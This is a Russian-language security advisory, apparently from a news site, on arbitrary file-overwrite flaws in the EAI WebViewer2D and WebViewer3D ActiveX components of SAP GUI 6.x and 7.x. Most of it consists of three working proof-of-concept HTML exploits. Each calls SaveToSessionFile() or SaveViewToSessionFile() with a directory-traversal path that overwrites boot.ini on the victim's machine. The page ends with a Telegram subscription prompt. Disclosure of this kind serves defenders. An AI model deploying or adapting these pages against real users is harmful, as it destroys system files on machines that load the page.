Программа:
EnjoySAP
SAP GUI 6.x
SAP GUI 7.x

Найденная уязвимость позволяет перезаписать произвольные файлы на целевой
системе. Уязвимость существует из-за ошибки в проверке входных данных при
обработке Атакующий может перезаписать произвольные файлы на целевой системе.

1) Уязвимость существует из-за ошибки в EAI WebViewer2D ActiveX компоненте
(WebViewer2D.dll). Атакующий может передать специальные аргументы в метод
SaveToSessionFile(), что позволит перезаписать произвольные файлы.

Эксплоит:

<HTML>
<BODY>
<object id=ctrl classid="clsid:{A76CEBEE-7364-11D2-AA6B-00E02924C34E}"></object>
<SCRIPT>
function Do_1t()
{
File = "../../../../../../../../../../../../boot.ini"
ctrl.SaveToSessionFile(File)
}
</SCRIPT>
<input language=JavaScript onclick=Do_1t() type=button value="P0c">
</BODY>
</HTML>

2) Уязвимость существует из-за ошибки в EAI WebViewer3D ActiveX компоненте
(WebViewer3D.dll) . Атакующий может передать специальные аргументы в методы
SaveToSessionFile() и SaveViewToSessionFile(), что позволит перезаписать
произвольные файлы.

Эксплоит:

<HTML>
<BODY>
<object id=ctrl classid="clsid:{AFBBE070-7340-11d2-AA6B-00E02924C34E}"></object>
<SCRIPT>
function Do_1t()
{
File = "../../../../../../../../../../../../boot.ini"
ctrl.SaveToSessionFile(File)
}
</SCRIPT>
<input language=JavaScript onclick=Do_1t() type=button value="P0c">
</BODY>
</HTML>

Эксплоит:

<HTML>
<BODY>
<object id=ctrl classid="clsid:{AFBBE070-7340-11d2-AA6B-00E02924C34E}"></object>
<SCRIPT>
function Do_1t()
{
File = "../../../../../../../../../../../../boot.ini"
ctrl.SaveViewToSessionFile(File)
}
</SCRIPT>
<input language=JavaScript onclick=Do_1t() type=button value="P0c">
</BODY>
</HTML>

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии